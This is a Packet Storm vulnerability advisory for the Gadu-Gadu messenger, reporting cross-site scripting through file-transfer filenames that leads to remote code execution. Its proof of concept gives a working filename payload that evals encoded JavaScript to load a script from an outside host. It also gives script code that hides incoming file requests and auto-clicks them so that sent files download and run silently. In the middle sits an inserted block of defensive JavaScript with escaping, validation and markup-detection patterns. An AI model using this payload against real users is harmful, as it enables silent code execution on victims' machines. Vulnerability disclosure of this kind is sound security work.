Gadu-Gadu Code Execution / Cross Site Scripting

2011-05-25T00:00:00
ID PACKETSTORM:101659
Type packetstorm
Reporter Kacper Szczesniak
Modified 2011-05-25T00:00:00

Description

                                        
Vendor: Gadu-Gadu (http://gadu-gadu.pl)
Vulnerable Version: All
Vulnerability Type: XSS, Remote Code Execution
Risk level: Very High
Credit: Kacper Szczesniak <kacper3.14@gmail.com>
Vulnerability Details:
  
Gadu-Gadu improperly handles file transfer requests. It is possible to
place 255 characters of HTML code (no slash) inside the filename. This
can lead to JavaScript being injected into the UI by means of a crafted
file-send-request packet. From the GUI's JavaScript context it is possible
to trigger various actions, such as saving and running any file on the
victim's host; the client's internal protocols are abused for this purpose.
No 'security' mechanisms like ASLR or DEP will stop this attack because it
is JS code. No user interaction is needed.
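The root cause described above is untrusted filename text from a file-transfer request reaching an HTML/JavaScript UI unescaped, in a context privileged enough to drive the client's internal protocols. The following is an added example, not Gadu-Gadu's code and not part of the original advisory, showing how a client should validate and escape such a name before rendering it, plus a detection heuristic for telemetry that flags names shaped like the advisory's payload (an opening tag, an inline `on*=` handler, `autofocus`, or a `javascript:` scheme). The function names, the use of the 255-character limit as a validation bound, and the sample filenames are assumptions or constructed; the real client's DOM ids and functions are not used.

```javascript
// Added example (not Gadu-Gadu's code): defensive handling of a filename
// received in a file-transfer request before it is shown in an HTML/JS UI.
// Assumption: the UI renders the incoming name into the DOM; the real
// client's function names and DOM ids are unknown and are not used here.

const MAX_FILENAME_LEN = 255; // the advisory notes 255 chars fit in the field

// HTML-escape the five characters that matter inside element content and
// double-quoted attribute values. Escaping (not stripping) keeps legitimate
// names like "Q&A notes.txt" intact while neutralising any markup.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Detection heuristic for logging/alerting: does the raw filename look like
// injected markup? The advisory's payload needs no closing tag or slash, so
// we look for an opening tag, an inline event handler, autofocus (what lets
// the payload fire without a click), or a script URL scheme. This is for
// telemetry only; safe rendering relies on escapeHtml, never on this filter.
const MARKUP_PATTERNS = [
  /<\s*[a-z!\/?]/i,   // start of a tag such as <input
  /\bon[a-z]+\s*=/i,  // inline handler such as onfocus=
  /\bautofocus\b/i,   // attribute that fires the handler with no interaction
  /javascript\s*:/i,  // script URL scheme
];

function looksLikeInjectedMarkup(name) {
  return MARKUP_PATTERNS.some((re) => re.test(name));
}

// Validate a filename before it is accepted at all. Returns {ok, reason, name}.
function validateFilename(raw) {
  if (typeof raw !== 'string' || raw.length === 0) return { ok: false, reason: 'empty' };
  if (raw.length > MAX_FILENAME_LEN) return { ok: false, reason: 'too long' };
  if (/[\u0000-\u001f\u007f]/.test(raw)) return { ok: false, reason: 'control chars' };
  if (/[\/\\]/.test(raw)) return { ok: false, reason: 'path separator' };
  return { ok: true, reason: '', name: raw };
}

// Build the HTML for one file-request entry. The name only ever reaches the
// markup through escapeHtml; the `suspicious` flag tells the caller to log it.
function renderFileRequest(raw) {
  const v = validateFilename(raw);
  const suspicious = looksLikeInjectedMarkup(raw);
  const shown = v.ok ? escapeHtml(v.name) : '(invalid filename)';
  const html = `<div class="file" title="${shown}">${shown}</div>`;
  return { html, accepted: v.ok, suspicious, reason: v.reason };
}

// Preferred when a DOM node is available: assign untrusted text via
// textContent, never innerHTML, so the browser never parses it as markup.
function setFilenameText(node, raw) {
  const v = validateFilename(raw);
  node.textContent = v.ok ? v.name : '(invalid filename)';
  return v.ok;
}

// Constructed sample inputs: the first has the shape of the advisory's
// payload (tag + inline handler + autofocus), the second is a benign name.
const SAMPLE_INJECTED = '<input onfocus="alert(1)" autofocus>';
const SAMPLE_BENIGN = 'Q&A notes.txt';
```

The validation step rejects path separators and control characters outright, while a name that merely contains angle brackets is still accepted but displayed as literal text; that choice keeps odd-but-honest filenames working and leaves `looksLikeInjectedMarkup` as a signal for detection rather than a gate the rendering depends on.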
  
PoC:  
  
file name that loads external x.js code:  
<input onfocus="eval(unescape('x%3Ddocument.getElementsByTagName%28%27head%27%29.item%280%29%3By%3Ddocument.createElement%28%27script%27%29%3By.src%3D%27http:%2f%2fasd.pl%2fx.js%27%3Bx.appendChild%28y%29%3B'));this.setAttribute('onfocus',0);"  
autofocus>  
  
example x.js code to hide, accept and open every file request:  
  
document.getElementById('extra').innerHTML = '<style>.file,  
.entrySeparator{display:none;}</style>';  
n = document.getElementById('open_file');  
n.setAttribute('id', '');  
  
function ff(){  
if(f = document.getElementById('open_file')) {  
e = document.createEvent("HTMLEvents");  
e.initEvent('click', true, true);  
f.dispatchEvent(e);  
f.setAttribute('id', '');  
}  
setTimeout('ff()', 1000);  
}  
  
ff();  
  
Now you can just send any file and it will be silently auto-downloaded and executed.
  
kacper  